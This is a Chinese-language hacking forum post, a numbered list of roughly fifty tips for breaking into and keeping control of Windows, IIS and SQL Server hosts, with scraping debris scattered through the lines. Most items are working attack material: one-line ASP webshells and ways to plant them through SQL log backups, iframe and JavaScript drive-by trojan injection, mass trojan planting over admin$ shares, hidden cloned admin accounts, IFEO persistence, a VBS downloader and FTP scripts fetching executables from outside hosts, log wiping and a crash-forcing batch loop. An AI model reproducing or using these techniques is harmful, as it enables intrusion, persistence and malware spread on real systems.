中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]
作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,) r/ r1 u& x$ v- V/ z0 k
cacls C:\windows\system32 /G hqw20:R0 Y2 P" Q8 Q' X+ l. h' h1 _: q
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
" D* c" f$ F, L* A- @5 B恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F- B: K' }' O! `. _7 D9 Q
* x- w2 ]0 i  R
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。2 c4 ^+ K- I% Y9 t& e( u, Y5 g) o( X7 x

5 \4 H7 ?' e4 r3 O0 _3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。, L7 R; l1 L: ~6 Q

5 p  u8 W  I" h7 `; `. L0 k4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号' q- E7 ?- ?; ?

2 U4 h- V% a. D2 f& p5、利用INF文件来修改注册表7 }7 ]: N( {& ^) J& h. g) x! K
[Version]
5 B2 w; Z+ d" H  W8 v2 vSignature="$CHICAGO$") M9 l& A( j9 I( a( Q
[Defaultinstall]  A# x9 f) W) A4 c7 S9 Z% `
addREG=Ating+ Y6 X) t( O6 i$ H! [, J2 O
[Ating]
3 [( O* n2 o/ p! c4 ?+ mHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
; E* U: \' R. F以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:; Y! m8 E+ j2 j. R8 }# b
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径$ p! Q" D- n; i0 `  L: w
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
7 T; G9 u/ K' lHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 _: F: ^$ y: o8 f# o! {* P5 AHKEY_CURRENT_CONFIG 简写为 HKCC( ~; q  u4 X3 D+ W, k2 A( S
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值1 `; e0 Q7 [& ]6 m, Z; {
"1"这里代表是写入或删除注册表键值中的具体数据( @3 X0 J# j' ?$ T- l. i  q$ n, ^
: F; p7 f5 Y/ O, {& O
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,5 @! V! j1 [) B7 J& h, \) a6 U2 A
多了一步就是在防火墙里添加个端口,然后导出其键值
2 B( A$ I" a. P* m  `6 U7 I[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]- D5 {5 n. T2 ]6 i8 u8 B9 A& d

  o- q7 |& C# X3 ]- e& q2 P; g# A7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽# w2 W8 x  }0 I% d
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。& }7 D$ n+ u% L) j- E
0 X1 U9 N! t" J& Z
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
' ?0 i. z2 Z$ W% {2 e+ x' {; x: Y' Q/ Q
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,7 K0 n$ R: [. ?$ S3 b% K' ]+ d
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ W$ M* Z: r3 ]+ d. k6 P5 y  a8 a/ }/ Z& T
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
1 o3 ^& o+ T; d3 n( |
( q* O( B+ m" a% {11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
* F, V: N& J& \% |  a. I2 w用法:xsniff –pass –hide –log pass.txt
: S2 Y9 ]5 x/ h: I( Y4 m) B2 W; R+ m; ]7 b4 {. t
12、google搜索的艺术& P7 k7 X7 |( ?+ x. G% s0 f+ K
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”6 \8 o# W0 l" L4 w% \
或“字符串的语法错误”可以找到很多sql注入漏洞。
5 a$ x0 W4 k( k2 x
' f  H0 j9 s5 V. K' h* r13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。9 B% i9 |3 R7 u/ V- B
9 |$ P3 c1 d+ K3 S* U2 H$ G3 w! N
14、cmd中输入 nc –vv –l –p 1987  S1 T" j" `% d; n5 @- c
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
, T5 i5 g5 u, r6 s; t( {6 v) X- M
0 {$ h  F% }9 x' a/ s9 S  Y15、制作T++木马,先写个ating.hta文件,内容为6 J  l/ {& R0 n9 t- z
<script language="VBScript">! w+ s1 I5 k/ y" ^
set wshshell=createobject ("wscript.shell" )
4 e, g* _* K# O7 y* Ua=wshshell.run("你马的名称",1)
: \0 a. G4 \4 d: B( Q/ Q# W  ~window.close& L& P5 R. j% o- j* ]
</script>
1 L3 m7 v& b: {6 G$ M再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。- m3 e2 c% T' V
: ^* X0 Q3 I: ?6 p. N
16、搜索栏里输入
- F, z# Q5 S" _8 X; v关键字%'and 1=1 and '%'='
( a5 r' R3 M. y+ I7 P; L" P关键字%'and 1=2 and '%'='
" O( K1 ^; q3 K5 R: L比较不同处 可以作为注入的特征字符
/ y" S' G; @1 y  e0 E7 x8 Y' U0 F% S" n, r2 ~
17、挂马代码<html>2 p3 A% C0 {; ]
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
: O. P$ u; q0 N4 ?$ P8 M' N</html>
( u3 F2 Y4 D: A% k) ], O+ i4 @! U0 L3 p( |5 `; r( h1 |7 q
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
2 Z$ I' ~5 `* Wnet localgroup administrators还是可以看出Guest是管理员来。, N* _  N' n9 c- ^6 F" a* S

, r  ]0 y* _  q- Z# q, N% t& [. d19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等$ I; C* S9 N2 y2 j
用法: 安装: instsrv.exe 服务名称 路径8 \( ?; l: `! E/ L( ~4 D
卸载: instsrv.exe 服务名称 REMOVE
; f4 X6 A/ e% G- t1 s& J
( g5 C9 f0 G( a! S/ ?6 K2 y; P% U
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
  `4 B1 w, a& z5 C$ d+ C5 V不能注入时要第一时间想到%5c暴库。
1 _) U9 T4 I- ?5 w* S8 v1 k- |/ I' v
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~; X; [, G2 m) m/ K# g, {( k
/ s. r1 W$ b( P; P
23、缺少xp_cmdshell时7 t  p% U7 A5 j- P
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 j+ n$ k5 N; S, G2 a假如恢复不成功,可以尝试直接加用户(针对开3389的)
0 l# _! D  D5 Q' H! D/ W* ndeclare @o int+ e# G+ \$ _2 |& }+ H
exec sp_oacreate 'wscript.shell',@o out. r$ l7 p! R* l+ U8 S4 f9 _
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
+ K- U, C% I  O- S( O3 G+ {
2 W/ l" M3 s2 N5 j24.批量种植木马.bat
4 G( q  \9 w% [' D3 f8 V  G; Mfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中' K. k2 ], Z( j" ]/ v
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间/ e3 g3 E+ F/ P- H4 z. {
扫描地址.txt里每个主机名一行 用\\开头# T& s2 V6 S6 ~$ k( `' A

: M2 P6 _1 C( ?# I1 f' X( \) K3 \25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 I0 D# u' B1 _/ J- z

7 G4 h+ _/ i% k+ q; E; @) x26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
4 G3 E5 K5 D7 t: r4 N- a将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
/ F' k4 B  ?6 g% x% r.cer 等后缀的文件夹下都可以运行任何后缀的asp木马. Q% u* [/ g! E- p9 V8 S: `

# a& P- E5 X( r6 q& b5 Z1 v27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
$ v; {6 p) k7 g, _7 f然后用#clear logg和#clear line vty *删除日志6 Q) a- Y' L# I$ W5 z  f

6 g. E! I9 L: D5 d+ c; x0 [$ N28、电脑坏了省去重新安装系统的方法7 J0 N/ q2 H  F7 @6 |
纯dos下执行,
0 I: L% ?2 {8 B% x  Jxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
1 G% V1 Y1 u3 I9 V2 G2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config- M: S7 C  e1 N% l: [8 |' U
0 r- w% i/ s0 L* k( y$ |, K
29、解决TCP/IP筛选 在注册表里有三处,分别是:
! r+ R/ z3 J8 Z" O$ Q8 V! ZHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip. l" S1 x2 }. K+ a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( K1 y: X- X: j0 r% {HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% }2 }0 f1 _% Z
分别用0 c- K% F" i' S/ g: g8 v/ {8 _
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 U* Z6 }3 w0 R6 n
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 m+ K, Y1 Z4 X$ `/ g. t0 i
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" X- ]7 x: y' K- w$ y( i命令来导出注册表项
, x/ B. J! u# |$ X: \- z然后把三个文件里的EnableSecurityFilters"=dword:00000001,
( o' K/ o, ], N5 F/ C3 Y8 F改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
, v$ ]2 `5 b1 {; V6 m4 tregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, W( V- V' k9 d/ ?- {0 F

5 e% L% c) V. |- F' _1 A. D30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U/ J) `2 Q; r  X& p6 g2 ]
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3( p# v0 \$ b- x; i6 ^
: S" h+ I6 w# V1 n) W: M
31、全手工打造开3389工具
! b) n% k4 D; _; w9 `打开记事本,编辑内容如下:4 X2 f& r% f( T5 m2 m
echo [Components] > c:\sql1 E/ i& f8 I# P
echo TSEnable = on >> c:\sql
0 c4 G, y9 c4 [7 ysysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
3 [7 U3 S1 b% X) I, ^0 x% Y编辑好后存为BAT文件,上传至肉鸡,执行8 X/ |' G- o1 H% X* o
, v& b( N7 }6 Y
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马: F# @/ Z# @$ Z7 f* ~1 o9 }2 z7 s

' @9 Y0 ~1 `9 E4 s( t  T' ]33、让服务器重启  m+ w, o0 W1 s6 H: \* u
写个bat死循环:) {5 a8 a3 c/ Q
@echo off
' f) [$ x7 J! R- M! I" v:loop1
  p2 Z' e, v& fcls% a, i4 `! M1 u/ Z( ]6 H
start cmd.exe' y) i6 L$ _" r& Y: W4 |
goto loop1
3 q0 I0 T6 C6 P& Q  ]7 H保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启1 s/ u4 Z8 L: ^6 u- Z
4 e) {/ J) q0 _7 [; O. o
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; @3 J! Z2 M$ X1 c. @* V  a$ x/ x
@echo off
: T2 h' G: e2 ~! Ndate /t >c:/3389.txt
  Y0 Y0 {) C5 _$ R! b- F8 ftime /t >>c:/3389.txt
9 Y) e' w6 m9 z6 ]attrib +s +h c:/3389.bat
- z9 ^4 Z* l( j7 D1 cattrib +s +h c:/3389.txt" f4 M! v3 G" z5 ~& }# W# M8 o
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt! O* @% z3 u) T0 t% z& @5 t8 D
并保存为3389.bat
! a3 G+ X: p7 _8 p% K5 p打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
% w( B  |& [8 s, {5 x# i6 X# ?" L: t' v% z3 ]  Z
35、有时候提不了权限的话,试试这个命令,在命令行里输入:* s, a  W$ R8 }! J5 B
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)' `# y2 z( o( n2 K/ F; x' f8 O
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
+ R% K" L* s9 a4 ^3 L# Q. |
6 }/ x1 D1 T% M0 K; O36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件$ c7 R5 ~% x7 q6 B+ O( g' `
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 l7 ^$ l$ q, X( }echo 你的FTP账号 >>c:\1.bat //输入账号- x% U. @* U' h3 @: i/ ~: e* V
echo 你的FTP密码 >>c:\1.bat //输入密码
5 @; |: R( b6 W% zecho bin >>c:\1.bat //登入+ |: ?6 B" V" j, G
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么6 j# l/ |/ k4 f* b2 n7 W) b3 J) f
echo bye >>c:\1.bat //退出
7 z, u& o5 Z- w然后执行ftp -s:c:\1.bat即可
- e, @4 C( z- n& z- B$ y
! Z2 F$ d  x0 j- c9 Y& X, W37、修改注册表开3389两法
& P6 d0 N: x8 ^& j(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表+ C1 F! h5 ^# d1 j1 a0 F
echo Windows Registry Editor Version 5.00 >>3389.reg" E9 G/ o4 G' R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg& B# ]' V8 a! X# m7 C) N  t
echo "Enabled"="0" >>3389.reg
+ F% f. T! l6 {) N9 |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
; W0 w8 l8 Z0 o, y3 FNT\CurrentVersion\Winlogon] >>3389.reg
: _  J4 S  H( u8 k0 Z# Wecho "ShutdownWithoutLogon"="0" >>3389.reg
) Z2 m' J8 X9 x' m: ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
1 W( s! W9 b/ Q* ]) ]>>3389.reg
8 u: ?" @9 ~6 E/ ^( s) ?echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
! ~  ]# c+ ]# S# O" z  a- U. Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
& l% K2 ~; n* Q, @. ~, A0 K>>3389.reg
( f) |: q4 }, I4 l. Necho "TSEnabled"=dword:00000001 >>3389.reg
6 X. N, Y3 ]* j+ K" y+ Y* R# secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
; P. N& D$ q* ^! W. L9 u7 \echo "Start"=dword:00000002 >>3389.reg  d' y/ m' q9 q; n& v2 D' W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
/ b1 v: [- K0 {4 D1 f$ A>>3389.reg. c: L: Y" N0 i& W6 Q" I) w
echo "Start"=dword:00000002 >>3389.reg
; d% L- G6 }7 y/ N/ N. ]echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
; X% D1 E! E/ Q7 t( ^& \echo "Hotkey"="1" >>3389.reg
& G( Q4 i8 g; L1 N7 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal  O. M5 D4 v' F/ g
Server\Wds\rdpwd\Tds\tcp] >>3389.reg# u* W$ s" W8 r( ^& v+ y* Z
echo "PortNumber"=dword:00000D3D >>3389.reg5 Z( f, Q+ C6 h( d  U* e0 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, G( N8 J3 H  O% A) V2 m+ I& R
Server\WinStations\RDP-Tcp] >>3389.reg
, m7 G' H; e) D7 r; Zecho "PortNumber"=dword:00000D3D >>3389.reg
1 |% c( u8 p' r把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
6 `7 d1 r. i1 p: ?" p4 r(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
: i9 \$ X# K9 q" R& i因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
# m' n. [6 _3 L(2)winxp和win2003终端开启
; S+ l4 u  A, u用以下ECHO代码写一个REG文件:# k6 R' _: O6 z, m
echo Windows Registry Editor Version 5.00>>3389.reg
4 B- {0 N# _/ O- f& Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  \) V& _1 O0 |4 v  R2 t. T7 V6 NServer]>>3389.reg
7 e$ C- N& f! j3 k6 w' R% W' ]echo "fDenyTSConnections"=dword:00000000>>3389.reg
. r" m5 j5 f3 d- m' k# f# gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. @. J6 R& V7 D1 }5 B* }Server\Wds\rdpwd\Tds\tcp]>>3389.reg2 R5 Q( ?$ X0 I5 a6 f$ \
echo "PortNumber"=dword:00000d3d>>3389.reg
! T1 @4 p; q( Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 S% M, w7 z) nServer\WinStations\RDP-Tcp]>>3389.reg
3 d  H" K: U# n# d0 ]echo "PortNumber"=dword:00000d3d>>3389.reg
9 F2 g& F; g2 |0 j  V) i4 U7 D2 B) Q然后regedit /s 3389.reg del 3389.reg
$ H! R# {" N: k3 O2 l6 cXP下不论开终端还是改终端端口都不需重启' B2 O! M+ N" S# G% F1 c

: L) M* ?. b9 w4 g/ A- r( f: b38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
/ p5 @* S& S: N5 f" r! I) O用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 D6 l4 X( e, M. F6 n
) Z2 y3 p% p' W, }- g  ^3 |39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!% R" X! A) ^1 Y: n( c
(1)数据库文件名应复杂并要有特殊字符- o4 v/ P; [9 a1 ]
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源7 {, t- A  [  ~/ {- v+ K- v4 c- e
将conn.asp文档中的# n5 V& x% ?, G: f$ o# {/ c
DBPath = Server.MapPath("数据库.mdb")
; A+ L* Q! Q' t! T% X1 p) tconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath. w8 y4 O6 Y. C) T% e
, L; s# B$ E9 r$ n: F
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- x4 ~2 Q" P; B4 p2 w(3)不放在WEB目录里
) m" ^  ~- N( ?  a! E. f* ]! l3 q+ @
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
; E1 m( O9 R% ^! g- M3 A! ]: y可以写两个bat文件5 c4 r/ l+ G6 ]+ ]. l! b
@echo off
! S+ W# Z  M# K* e; G# j' ~@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
  [. d& E# `: y/ m@del c:\winnt\system32\query.exe/ z" _! N" F5 B0 ^% y4 a/ _% {
@del %SYSTEMROOT%\system32\dllcache\query.exe
# }0 i/ R8 f9 D9 T. A7 ~! u@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的8 b4 \: z/ Q! p

, N* k& [) [. @, S! o@echo off( K% `+ m. f2 ^6 D6 r
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe8 Y* M+ \7 M! n) e3 W3 N# y
@del c:\winnt\system32\tsadmin.exe
5 p& `" q9 D: X* Q4 f8 z@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex* M' f# E6 @8 B( O
* O/ }! G1 c1 [8 Z- `! ]+ b- w
41、映射对方盘符. `7 U: w0 z9 @/ V+ ^0 Y
telnet到他的机器上,. v2 }  T1 b: n0 G( @; V
net share 查看有没有默认共享 如果没有,那么就接着运行
" n, o" L0 D& w6 Bnet share c$=c:5 u" a+ [' I; j  u) o% o, }
net share现在有c$; {$ v% V5 M/ X
在自己的机器上运行
$ P# K5 Y! m' ?" Mnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
: X0 z' x7 V7 [4 R3 K- ~) @) f! n; ^1 t4 l+ t* O! B1 n) D7 I
42、一些很有用的老知识
3 p3 s/ G& j" @7 q, Xtype c:\boot.ini ( 查看系统版本 )0 S- P1 N. U, `6 ^' t; a5 o
net start (查看已经启动的服务)
2 o( }" i3 o6 p. Iquery user ( 查看当前终端连接 )
+ f& I, }$ O2 W4 c" h# l, S5 ]net user ( 查看当前用户 )
. P2 _" Z! i) w. N$ lnet user 用户 密码/add ( 建立账号 )( v. p/ b' i: s
net localgroup administrators 用户 /add (提升某用户为管理员), s/ g% d# h! n% A! a" u
ipconfig -all ( 查看IP什么的 ); _+ b' M+ X0 D0 @$ z% \7 ?
netstat -an ( 查看当前网络状态 )
" e- s$ `0 \( T9 Y4 {findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)) P- t$ b0 y) i; ^
克隆时Administrator对应1F45 C. c$ u/ F5 ~7 X) d  v) G
guest对应1F5
3 P0 {% r) j  k4 j1 ^- q9 Vtsinternetuser对应3E8
0 g" y/ C2 C% B: h; e& ?4 [' @
5 G. v  t4 @( A5 z+ G43、如果对方没开3389,但是装了Remote Administrator Service
6 h1 [, C7 C! G2 `1 w用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
. x/ x2 o( {. Q  @解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
, p/ j. X# r0 S2 Y3 [先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' W5 h+ M$ l( m- M! s# s: C( `$ [8 u, P3 Y2 x0 q/ n
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)5 a3 x0 z  ~+ b2 S
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) G1 L" ^; c/ {+ m+ e! I3 r: P6 p5 M0 y, \9 o( m
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)' i6 j. U; ^. g' [& F# K) Z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open- D& }! t8 q& H; Y. q
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 A7 [1 {$ n0 S7 v! l0 WCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =2 `) S9 ]. o4 Q; \% W4 @: W
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
5 ~( i$ B- T2 s5 Y# h7 ?# q( u(这是完整的一句话,其中没有换行符)6 q( p; B, H) X* _. d
然后下载:
0 X0 K2 {. f1 o% y9 _5 ~  scscript down.vbs http://www.hack520.org/hack.exe hack.exe" z, N: ]" S! X, ?# o

4 S# H/ }% e) _- H- d46、一句话木马成功依赖于两个条件:
: Z5 f% e; G9 r! r1、服务端没有禁止adodb.Stream或FSO组件
& S, P7 d  a  n5 T0 l; A0 a# D2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
  c# Y, U# d0 z# `/ g
3 o+ F  J0 k$ T& Q2 [47、利用DB_OWNER权限进行手工备份一句话木马的代码:
  \6 G1 s" I, [# O;alter database utsz set RECOVERY FULL--
) q) d/ `0 e; G;create table cmd (a image)--( @/ q" F0 C  p4 P, I8 s! }
;backup log utsz to disk = 'D:\cmd' with init--: w& F2 K1 f. ~1 w# J
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
, u5 L1 w4 x' m+ U' G;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" Y( ~* S& B1 D* c* ]4 A
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
' v( A: B* B( ~( ^1 o; f
) U( o0 s- Y/ O+ \& f48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
- a5 W$ U7 L/ g
8 S' J+ z( u9 E9 f3 B; X; X用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options; v) T; [4 W- p" q2 Q% V
所有会话用 'all'。
0 e' z! x, U# X+ _: u: d-s sessionid 列出会话的信息。
; Q" a: j: s( S, A8 A# p, w-k sessionid 终止会话。% q6 ]( E! e& s% D
-m sessionid 发送消息到会话。
$ i) W8 |5 G# H- [# U, P( A# X, D1 ?( }
config 配置 telnet 服务器参数。0 Y* c* E4 O1 d
( s5 s$ S  h3 H/ X) t2 |! b. h
common_options 为:
( l  l9 L% v3 e6 ]) ^* c-u user 指定要使用其凭据的用户9 c$ j& U1 z  f5 u) S
-p password 用户密码
+ p( P% m1 S$ T7 K" j
: p8 a2 H: b2 k3 x, f! }config_options 为:0 [& w( z% n  {7 r6 r3 \1 v
dom = domain 设定用户的默认域  o  O( e1 B8 ]# _7 Q1 ^$ ^
ctrlakeymap = yes|no 设定 ALT 键的映射
9 R2 m8 }1 |; @# O0 R$ T  ktimeout = hh:mm:ss 设定空闲会话超时值
3 F' |" N% j. b( |% atimeoutactive = yes|no 启用空闲会话。
' x  D) T0 E$ `% [maxfail = attempts 设定断开前失败的登录企图数。
8 h+ l0 G4 i1 @) }3 cmaxconn = connections 设定最大连接数。
; h# g! }7 e; Z! N6 T5 vport = number 设定 telnet 端口。' ]2 m6 F4 z, Q5 J. @% {" f
sec = [+/-]NTLM [+/-]passwd
0 [: g0 l. I+ g  x2 d, @/ X5 b设定身份验证机构( t9 g  O9 V7 Z- ^- n4 s
fname = file 指定审计文件名。
6 ~) X+ M: v* M" ifsize = size 指定审计文件的最大尺寸(MB)。
# B2 A) g! w0 F1 [; @. @% l+ Ymode = console|stream 指定操作模式。
& b& ~1 s4 C. }2 u+ ]7 R1 ?% Mauditlocation = eventlog|file|both
6 [6 I3 t" g' `8 @指定记录地点
9 w, J( S3 p' {. |9 xaudit = [+/-]user [+/-]fail [+/-]admin
0 z4 B. F$ L0 w, K: y. Y( s$ N1 x$ V3 j% j5 d2 m
49、例如:在IE上访问:) r& u0 H) F6 `+ {/ o
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
; J$ L* z1 f1 R5 W! V$ B5 p8 h. |hack.txt里面的代码是:8 F! U# X, M- @) t+ k) g6 m: I
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, t: l; e- A( G) D$ F0 Y; @4 D7 w8 H把这个hack.txt发到你空间就可以了!0 [' \8 D5 P7 N. w3 j& `7 R
这个可以利用来做网马哦!
9 A# E# d, W0 r% b1 V4 h  n6 {& Z# l
50、autorun的病毒可以通过手动限制!
3 y* i* w+ o; d, L1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( F9 p3 V1 \/ [2 f; I: a2,打开盘符用右键打开!切忌双击盘符~
+ Q4 Y8 k- z% C2 z* ^$ U, ~3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
' u( }( c9 a6 L/ E8 ?# b3 j: i. d
( H) M6 _8 U- s51、log备份时的一句话木马:
8 M1 ]+ X6 ]8 r) n  L0 p# C  `4 Ra).<%%25Execute(request("go"))%%25>
/ K: w+ [5 [) u4 D3 j8 Ib).<%Execute(request("go"))%>+ w/ L1 q; r$ ~2 o& W
c).%><%execute request("go")%><%7 q5 s' S8 D' l8 q+ D+ R  T
d).<script language=VBScript runat=server>execute request("sb")</Script>
" V- [. ~: ?' o. m, |! P& Ae).<%25Execute(request("l"))%25>
